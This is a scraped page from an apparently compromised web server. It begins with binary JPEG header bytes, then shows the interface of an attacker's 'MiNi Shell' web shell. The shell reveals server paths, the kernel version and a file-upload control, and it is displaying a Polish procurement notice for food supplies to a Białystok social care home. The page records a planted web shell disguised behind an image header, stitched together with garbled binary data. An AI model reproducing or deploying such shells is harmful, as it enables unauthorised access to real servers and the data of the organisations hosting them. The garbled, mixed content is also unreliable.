JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20231123/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20231123/0051035101-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa produktów spożywczych (5 pakietów) </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Dom Pomocy Społecznej</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000304674</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Świerkowa 9</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Białystok</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">15-328</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podlaskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL841 - Białostocki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@dps.bialystok.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.dps.bialystok.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Jednostka samorządowa </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Działalność społeczna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa produktów spożywczych (5 pakietów) </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b32d080c-89db-11ee-9fb5-3edbb70f45bd</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00510351</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-11-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00024666/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Dostawa artykułów żywnościowych 5 pakietów (na rok 2024 r.)</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-b32d080c-89db-11ee-9fb5-3edbb70f45bd <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl , sekretariat@dps.bialystok.pl , https://dpsbip.um.bialystok.pl/zamowienia_publiczne/, https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-b32d080c-89db-11ee-9fb5-3edbb70f45bd</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">https://ezamowienia.gov.pl , sekretariat@dps.bialystok.pl , https://dpsbip.um.bialystok.pl/zamowienia_publiczne/, https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-b32d080c-89db-11ee-9fb5-3edbb70f45bd</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DGO/341p-3/23</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">5</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Baleron wp. wędzony, gotowany	23 kg<br/>2.	Baleron z indyka	170 kg<br/>3.	Boczek wp. wędzony, parzony b/k	100 kg<br/>4.	Boczek z polędwicą rolowany	100 kg<br/>5.	Ćwiartka z kurczaka	10 kg<br/>6.	Filet świeży z indyka	50 kg<br/>7.	Filet świeży z kurczaka 1200 kg<br/>8.	Filet wędzony	100 kg<br/>9.	Flaki wołowe krojone mrożone	130 kg<br/>10.	Golonka konserwowa	160 kg<br/>11.	Karkówka wieprzowa surowa b/k	600 kg<br/>12.	Kaszanka pieczona	120 kg<br/>13.	Kiełbasa biała, parzona	300 kg<br/>14.	Kiełbasa krakowska formowana	130 kg<br/>15.	Kiełbasa krakowska parzona	230 kg<br/>16.	Kiełbasa krakowska sucha	30 kg<br/>17.	Kiełbasa krakowska z indyka	30 kg<br/>18.	Kiełbasa krucha	170 kg<br/>19.	Kiełbasa na „święconkę”	40 kg<br/>20.	Kiełbasa pieczona podsuszana	100 kg<br/>21.	Kiełbasa podwawelska	200 kg<br/>22.	Kiełbasa spod strzechy	160 kg<br/>23.	Kiełbasa szynkowa wieprzowa	350 kg<br/>24.	Kiełbasa toruńska	200 kg<br/>25.	Kiełbasa wieprzowa bez glutenowa	1 kg<br/>26.	Kiełbasa z piersi kurczaka	50 kg<br/>27.	Kiełbasa żywiecka drobiowa	100 kg<br/>28.	Kiełbasa żywiecka wieprzowa	200 kg<br/>29.	Konserwa wojskowa	100 kg<br/>30.	Krupnioki	220 kg<br/>31.	Kurczak po sarmacku	110 kg<br/>32.	Kurczak z żurawiną	150 kg<br/>33.	Kurczak/ indyk w galarecie	80 kg<br/>34.	Kurczaki świeże	100 kg<br/>35.	Łopatka prasowana	100 kg<br/>36.	Łopatka wieprzowa surowa b/k	1950 kg<br/>37.	Mortadela wieprzowa	170 kg<br/>38.	Nogi wieprzowe.	100 kg<br/>39.	Ogonówka wp wędzona, parzona	300 kg<br/>40.	Parówki delikatne np. królewskie	310 kg<br/>41.	Parówkowa firmowa 300 kg<br/>42.	Pasztet jarski	10 kg<br/>43.	Pasztet wieprzowy	100 kg<br/>44.	Pasztet z całego kurczaka	100 kg<br/>45.	Pasztetowa drobiowa.	200 kg<br/>46.	Pasztetowa wp.	50 kg<br/>47.	Pieczeń drobiowa zawartość mięsa minimum 98%	80 kg<br/>48.	Pieczeń rzymska	80 kg<br/>49.	Pieczeń schabowa	170 kg<br/>50.	Pierś z indyka z suszonymi pomidorami	50 kg<br/>51.	Podudzia z kurczaka	20 kg<br/>52.	Polędwica drobiowa extra	50 kg<br/>53.	Polędwica drobiowa sopocka	50 kg<br/>54.	Polędwica wieprzowa sopocka	300 kg<br/>55.	Polędwica wiśniowa	290 kg<br/>56.	Polędwica wp.wędzona,parzona zawartość mięsa 75% 260 kg<br/>57.	Rolada z kurczaka zawartość mięsa minimum 65 %	30 kg<br/>58.	Rolada z kurczakiem	80 kg<br/>59.	Salami bumerang	100 kg<br/>60.	Salceson czosnkowy	140 kg<br/>61.	Salceson wieprzowy czarny	100 kg<br/>62.	Salceson wieprzowy	140 kg<br/>63.	Schab biały 260 kg<br/>64.	Schab wieprzowy surowy b/k	1300 kg<br/>65.	Serca wieprzowe	70 kg<br/>66.	Szynka biała formowana 71% mięsa	330 kg<br/>67.	Szynka gotowana	170 kg<br/>68.	Szynka konserwowa	130 kg<br/>69.	Szynka pieczona	150 kg<br/>70.	Szynka wieprzowa świeża	10 kg<br/>71.	Szynka wp.tyrolska 180 kg<br/>72.	Szynka wp.wędzona,parzona zawarość mięsa minimum 81%	130 kg<br/>73.	Szynka z piersi indyka	260 kg<br/>74.	Szynka z warzywami	30 kg<br/>75.	Udziec z kurczaka	1100 kg<br/>76.	Wątróbka drobiowa z indyka	130 kg<br/>77.	Wątróbka drobiowa z kurczaka	80 kg<br/>78.	Wędlina drobiowa bez glutenowa	1 kg<br/>79.	Wędlina wieprzowa bez glutenowa	1 kg<br/>80.	Żeberka wieprzowe paski	600 kg </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15100000-9 - Produkty zwierzęce, mięso i produkty mięsne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-01 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Chleb baltonowski krojony 600 g	18000 szt.<br/>2.	Chleb wileński krojony 400 g	2400 szt.<br/>3.	Chleb żytni razowy 500 g	4500 szt.<br/>4.	Chleb wieloziarnisty krojony 500 g	2500 szt.<br/>5.	Chleb mieszany pytlowy trzy ziarna 500 g krojony	3200 szt.<br/>6.	Chleb mieszany z siemieniem lnianym 500 g krojony	200 szt.<br/>7.	Bułeczki wrocławskie 50 g	54000 szt.<br/>8.	Paluch wyborny 75 g	60 szt.<br/>9.	Bułeczki graham 80 g	5000 szt.<br/>10.	Bułeczki żytnie 60 g	10000 szt.<br/>11.	Chałka zdobna 200 g	1000 szt.<br/>12.	Pączki w cukrze pudrze 50 g	800 szt.<br/>13.	Bułka z marmoladą/ślimak 90 g	300 szt.<br/>14.	Paluszki z cynamonem 80 g	300 szt.<br/>15.	Wstążka jabłkowa	300 szt.<br/>16.	Bułka z serem 80 g	300 szt.<br/>17.	Bułka maślana 30 g	100 szt.<br/>18.	Bułeczka wiejska/swojska 80 g	100 szt.<br/>19.	Bułeczka z żurawiną 40 g	200 szt.<br/>20.	Bułeczka babuni z kruszonką 60 g	200 szt.<br/>21.	Drożdżówka / Placek z kruszonką ok. 320 g	50 szt.<br/>22.	Bułeczki słodkie waniliowe 50 g	300 szt.<br/>23.	Bułeczki z budyniem/ lemonka 80 g	300 szt.<br/>24.	Cebulak/ Bułka margerita 100 g	500 szt.<br/>25.	Bułeczka jagodzianka 80 g	300 szt.<br/>26.	Bułeczka musli	50 szt.<br/>27.	Bagietka 260/280 g	20 szt.<br/>28.	Chleb tostowy 500 g	20 szt.<br/>29.	Chleb bez glutenowy codzienny (jasny, ciemny) np. Balviten	20 kg<br/>30.	Ciasto przekładane porzeczkowe	80 kg<br/>31.	Makowiec	80 kg<br/>32.	Babka piaskowa	80 kg<br/>33.	Ciasto ”Królewiec”	80 kg<br/>34.	Ciasto śliwkowe	80 kg<br/>35.	Ptasie mleczko	80 kg<br/>36.	Przekładaniec (weneckie)	80 kg<br/>37.	Sernik	100 kg<br/>38.	Ciasto bankietowe	80 kg<br/>39.	Rolada z kremem i galaretką	80 kg<br/>40.	Babeczka wielkanocna	188 szt.<br/>41.	Ciasto krówka	80 kg </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15810000-9 - Pieczywo, świeże wyroby piekarskie i ciastkarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-01 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Drożdże piekarnicze	60 kg<br/>2.	Jogurt kremowy z owocami 122 g Fantazja-różne smaki	390 szt.<br/>3.	Jogurt naturalny 150 g	8000 szt.<br/>4.	Jogurt naturalny 350 g	30 szt.<br/>5.	Jogurt owocowy 150 g różne smaki	6500 szt.<br/>6.	Jogurt pitny naturalny 250 g	50 szt.<br/>7.	Jogurt pitny smakowy 250 g różne smaki	300 szt.<br/>8.	Jogurt pitny smakowy różne smaki b/cukru 250 g	200 szt.<br/>9.	Kefir 1,8%-3% tłuszczu 400 g	400 szt.<br/>10.	Margaryna zwykła 250 g 60% tłuszczu	800 szt.<br/>11.	Masło roślinne 250 g	10 szt.<br/>12.	Masło śmietankowe stołowe 200 g 82% tłuszczu	10400 szt.<br/>13.	Maślanka naturalna 1 litr	10 szt.<br/>14.	Mleko 2% luz, opakowanie 5 l	20000 l<br/>15.	Ser Favita 12% tł 270 g	10 szt.<br/>16.	Ser Mozzarella Classic 125 g	15 szt.<br/>17.	Ser Mozzarella mini 150 g	20 szt.<br/>18.	Ser Mozzarella wiórki 150 g	10 szt.<br/>19.	Ser pleśniowy naturalny 125 g	15 szt.<br/>20.	Ser żółty typu holenderskiego	150 kg<br/>21.	Ser żółty lekki 16% tł. W suchej masie	20 kg<br/>22.	Ser żółty rolada ustrzycka	60 kg<br/>23.	Ser żółty typu salami	150 kg<br/>24.	Ser żółty typu szwajcarskiego	130 kg<br/>25.	Serek homogenizowany 150 g - różne smaki	1300 szt.<br/>26.	Serek homogenizowany bez laktozy naturalny 150 g	10 szt.<br/>27.	Serek kanapkowy twarogowy 150 g - różne smaki	1650 szt.<br/>28.	Serek mascarpone 250 g	15 szt.<br/>29.	Serek mazowiecki topiony kremowy 100 g - kiełbaska	600 szt.<br/>30.	Serek topiony 100 g różne smaki	1600 szt.<br/>31.	Serek topiony 140 g krążki mix smaków	1000 szt.<br/>32.	Serek topiony plastry 130 g - różne smaki	800 szt.<br/>33.	Serek twarogowy ziołowy/naturalny 150g np. Deliser plastry	350 szt.<br/>34.	Serek wiejski lekki 150 g	250 szt.<br/>35.	Serek wiejski smakowy 150 g	500 szt.<br/>36.	Śmietana 18% 400 g	3300 szt.<br/>37.	Śmietanka UHT 30% tł 330 ml	10 szt.<br/>38.	Twaróg capri	150 kg<br/>39.	Twaróg półtłusty, krajanka	1600 kg<br/>40.	Twaróg sernikowy 1 kg wiaderko np. Piątnica	20 kg </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15500000-3 - Produkty mleczarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-01 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Agrest	2 kg<br/>2.	Arbuz	900 kg<br/>3.	Banany	1200 kg<br/>4.	Bazylia świeża	5 szt.<br/>5.	Borówka amerykańska	2 kg<br/>6.	Botwina	40 kg<br/>7.	Brokuł	50 szt.<br/>8.	Brukselka	5 kg<br/>9.	Brzoskwinie	170 kg<br/>10.	Burak ćwikłowy	1700 kg<br/>11.	Cebula	1200 kg<br/>12.	Cebula czerwona	70 kg<br/>13.	Cukinia	200 kg<br/>14.	Cykoria	2 kg<br/>15.	Cytryny	400 kg<br/>16.	Czereśnie	10 kg<br/>17.	Czosnek główka	300 szt.<br/>18.	Fasolka szparagowa	50 kg<br/>19.	Gruszki	1000 kg<br/>20.	Imbir korzeń	1 kg<br/>21.	Jabłka	3900 kg<br/>22.	Kalafior świeży	50 szt.<br/>23.	Kapusta biała	1700 kg<br/>24.	Kapusta czerwona	200 kg<br/>25.	Kapusta kwaszona	650 kg<br/>26.	Kapusta młoda	270 szt.<br/>27.	Kapusta pekińska	350 kg<br/>28.	Kiełki rzodkiewki, brokuła, lucerny itp.	10 szt.<br/>29.	Kiwi	5 kg<br/>30.	Koper	80 kg<br/>31.	Maliny	5 kg<br/>32.	Mandarynki	450 kg<br/>33.	Marchew	7500 kg<br/>34.	Melon żółty miodowy	10 kg<br/>35.	Morele	30 kg<br/>36.	Natka pietruszki	30 kg<br/>37.	Nektarynki	280 kg<br/>38.	Ogórki gruntowe	400 kg<br/>39.	Ogórki kwaszone	800 kg<br/>40.	Ogórki szklarniowe, sałatkowe	1000 kg<br/>41.	Papryka czerwona, żółta	600 kg<br/>42.	Pieczarki	250 kg<br/>43.	Pietruszka korzeń	1000 kg<br/>44.	Pomarańcze	800 kg<br/>45.	Pomidorki koktailowe	10 kg<br/>46.	Pomidory	2000 kg<br/>47.	Por	350 kg<br/>48.	Porzeczka czerwona, czarna	20 kg<br/>49.	Przyprawa-koper do ogórków	30 szt.<br/>50.	Roszponka	10 kg<br/>51.	Rukola	10 kg<br/>52.	Rzepa sopel	300 kg<br/>53.	Rzodkiewka	1400 szt.<br/>54.	Sałata lodowa	600 szt.<br/>55.	Sałata mix	10 kg<br/>56.	Sałata zielona	1600 szt.<br/>57.	Seler korzeń	1300 kg<br/>58.	Seler naciowy	5 kg<br/>59.	Susz owocowy	30 kg<br/>60.	Szczypior	1700 szt.<br/>61.	Szpinak	10 kg<br/>62.	Śliwki	350 kg<br/>63.	Truskawki	280 kg<br/>64.	Winogrona	10 kg<br/>65.	Wiśnie	20 kg<br/>66.	Ziemniaki	24000 kg<br/>67.	Ziemniaki młode	8000 kg </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">03220000-9 - Warzywa, owoce i orzechy</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-01 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) 